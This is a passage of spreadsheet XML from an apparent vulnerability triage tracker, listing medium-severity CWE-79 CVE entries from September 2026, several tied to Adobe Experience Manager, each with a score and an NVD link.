      <c r="I4917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4917" s="5" t="inlineStr"/>
      <c r="K4917" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t>
        </is>
      </c>
    </row>
    <row r="4918">
      <c r="A4918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75660</t>
        </is>
      </c>
      <c r="C4918" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4918" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4918" s="5" t="inlineStr"/>
      <c r="F4918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4918" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4918" s="5" t="inlineStr"/>
      <c r="I4918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4918" s="5" t="inlineStr"/>
      <c r="K4918" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t>
        </is>
      </c>
    </row>
    <row r="4919">
      <c r="A4919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75661</t>
        </is>
      </c>
      <c r="C4919" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4919" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4919" s="5" t="inlineStr"/>
      <c r="F4919" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4919" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4919" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4919" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4919" s="5" t="inlineStr"/>
      <c r="K4919" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L491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19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t>
        </is>
      </c>
    </row>
    <row r="4920">
      <c r="A4920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75666</t>
        </is>
      </c>
      <c r="C4920" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4920" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4920" s="5" t="inlineStr"/>
      <c r="F4920" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4920" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4920" s="5" t="inlineStr"/>
      <c r="I4920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4920" s="5" t="inlineStr"/>
      <c r="K4920" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t>
        </is>
      </c>
    </row>
    <row r="4921">
      <c r="A4921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75667</t>
        </is>
      </c>
      <c r="C4921" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4921" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4921" s="5" t="inlineStr"/>
      <c r="F4921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4921" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4921" s="5" t="inlineStr"/>
      <c r="I4921" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4921" s="5" t="inlineStr"/>
      <c r="K4921" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t>
        </is>
      </c>
    </row>
    <row r="4922">
      <c r="A4922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75668</t>
        </is>
      </c>
      <c r="C4922" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4922" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4922" s="5" t="inlineStr"/>
      <c r="F4922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4922" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4922" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4922" s="5" t="inlineStr"/>
      <c r="K4922" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t>
        </is>
      </c>
    </row>
    <row r="4923">
      <c r="A4923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75669</t>
        </is>
      </c>
      <c r="C4923" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4923" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4923" s="5" t="inlineStr"/>
      <c r="F4923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4923" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4923" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4923" s="5" t="inlineStr"/>
      <c r="K4923" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t>
        </is>
      </c>
    </row>
    <row r="4924">
      <c r="A4924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75670</t>
        </is>
      </c>
      <c r="C4924" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4924" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4924" s="5" t="inlineStr"/>
      <c r="F4924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4924" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4924" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4924" s="5" t="inlineStr"/>
      <c r="K4924" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t>
        </is>
      </c>
    </row>
    <row r="4925">
      <c r="A4925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75671</t>
        </is>
      </c>
      <c r="C4925" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4925" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4925" s="5" t="inlineStr"/>
      <c r="F4925" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4925" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4925" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4925" s="5" t="inlineStr"/>
      <c r="K4925" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t>
        </is>
      </c>
    </row>
    <row r="4926">
      <c r="A4926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75672</t>
        </is>
      </c>
      <c r="C4926" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4926" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4926" s="5" t="inlineStr"/>
      <c r="F4926" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4926" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4926" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4926" s="5" t="inlineStr"/>
      <c r="K4926" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t>
        </is>
      </c>
    </row>
    <row r="4927">
      <c r="A4927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75674</t>
        </is>
      </c>
      <c r="C4927" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4927" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4927" s="5" t="inlineStr"/>
      <c r="F4927" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4927" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4927" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4927" s="5" t="inlineStr"/>
      <c r="K4927" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t>
        </is>
      </c>
    </row>
    <row r="4928">
      <c r="A4928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75675</t>
        </is>
      </c>
      <c r="C4928" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4928" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4928" s="5" t="inlineStr"/>
      <c r="F4928" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4928" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4928" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4928" s="5" t="inlineStr"/>
      <c r="K4928" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t>
        </is>
      </c>
    </row>
    <row r="4929">
      <c r="A4929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75677</t>
        </is>
      </c>
      <c r="C4929" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4929" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4929" s="5" t="inlineStr"/>
      <c r="F4929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4929" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4929" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4929" s="5" t="inlineStr"/>
      <c r="K4929" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L492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29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t>
        </is>
      </c>
    </row>
    <row r="4930">
      <c r="A4930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75678</t>
        </is>
      </c>
      <c r="C4930" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4930" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4930" s="5" t="inlineStr"/>
      <c r="F4930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4930" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4930" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4930" s="5" t="inlineStr"/>
      <c r="K4930" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t>
        </is>
      </c>
    </row>
    <row r="4931">
      <c r="A4931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75679</t>
        </is>
      </c>
      <c r="C4931" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4931" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4931" s="5" t="inlineStr"/>
      <c r="F4931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4931" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4931" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4931" s="5" t="inlineStr"/>
      <c r="K4931" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t>
        </is>
      </c>
    </row>
    <row r="4932">
      <c r="A4932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75680</t>
        </is>
      </c>
      <c r="C4932" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4932" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4932" s="5" t="inlineStr"/>
      <c r="F4932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4932" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4932" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4932" s="5" t="inlineStr"/>
      <c r="K4932" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t>
        </is>
      </c>
    </row>
    <row r="4933">
      <c r="A4933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75681</t>
        </is>
      </c>
      <c r="C4933" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4933" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4933" s="5" t="inlineStr"/>
      <c r="F4933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4933" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4933" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4933" s="5" t="inlineStr"/>
      <c r="K4933" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t>
        </is>
      </c>
    </row>
    <row r="4934">
      <c r="A4934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75683</t>
        </is>
      </c>
      <c r="C4934" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4934" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4934" s="5" t="inlineStr"/>
      <c r="F4934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4934" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4934" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4934" s="5" t="inlineStr"/>
      <c r="K4934" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t>
        </is>
      </c>
    </row>
    <row r="4935">
      <c r="A4935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75685</t>
        </is>
      </c>
      <c r="C4935" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4935" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4935" s="5" t="inlineStr"/>
      <c r="F4935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4935" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4935" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4935" s="5" t="inlineStr"/>
      <c r="K4935" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t>
        </is>
      </c>
    </row>
    <row r="4936">
      <c r="A4936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75687</t>
        </is>
      </c>
      <c r="C4936" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4936" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4936" s="5" t="inlineStr"/>
      <c r="F4936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4936" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4936" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4936" s="5" t="inlineStr"/>
      <c r="K4936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t>
        </is>
      </c>
    </row>
    <row r="4937">
      <c r="A4937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75690</t>
        </is>
      </c>
      <c r="C4937" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4937" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4937" s="5" t="inlineStr"/>
      <c r="F4937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4937" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4937" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4937" s="5" t="inlineStr"/>
      <c r="K4937" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t>
        </is>
      </c>
    </row>
    <row r="4938">
      <c r="A4938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75691</t>
        </is>
      </c>
      <c r="C4938" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4938" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4938" s="5" t="inlineStr"/>
      <c r="F4938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4938" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4938" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4938" s="5" t="inlineStr"/>
      <c r="K4938" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t>
        </is>
      </c>
    </row>
    <row r="4939">
      <c r="A4939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75692</t>
        </is>
      </c>
      <c r="C4939" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4939" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4939" s="5" t="inlineStr"/>
      <c r="F4939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4939" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4939" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4939" s="5" t="inlineStr"/>
      <c r="K4939" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L493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39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t>
        </is>
      </c>
    </row>
    <row r="4940">
      <c r="A4940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75693</t>
        </is>
      </c>
      <c r="C4940" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4940" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4940" s="5" t="inlineStr"/>
      <c r="F4940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4940" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4940" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4940" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4940" s="5" t="inlineStr"/>
      <c r="K4940" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t>
        </is>
      </c>
    </row>
    <row r="4941">
      <c r="A4941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75694</t>
        </is>
      </c>
      <c r="C4941" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4941" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4941" s="5" t="inlineStr"/>
      <c r="F4941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4941" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4941" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4941" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4941" s="5" t="inlineStr"/>
      <c r="K4941" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t>
        </is>
      </c>
    </row>
    <row r="4942">
      <c r="A4942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75695</t>
        </is>
      </c>
      <c r="C4942" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4942" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4942" s="5" t="inlineStr"/>
      <c r="F4942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4942" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4942" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4942" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4942" s="5" t="inlineStr"/>
      <c r="K4942" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t>
        </is>
      </c>
    </row>
    <row r="4943">
      <c r="A4943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75696</t>
        </is>
      </c>
      <c r="C4943" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4943" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4943" s="5" t="inlineStr"/>
      <c r="F4943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4943" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4943" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4943" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4943" s="5" t="inlineStr"/>
      <c r="K4943" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t>
        </is>
      </c>
    </row>
    <row r="4944">
      <c r="A4944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75700</t>
        </is>
      </c>
      <c r="C4944" s="5" t="n">
        <v>5.4</v>
      </c>
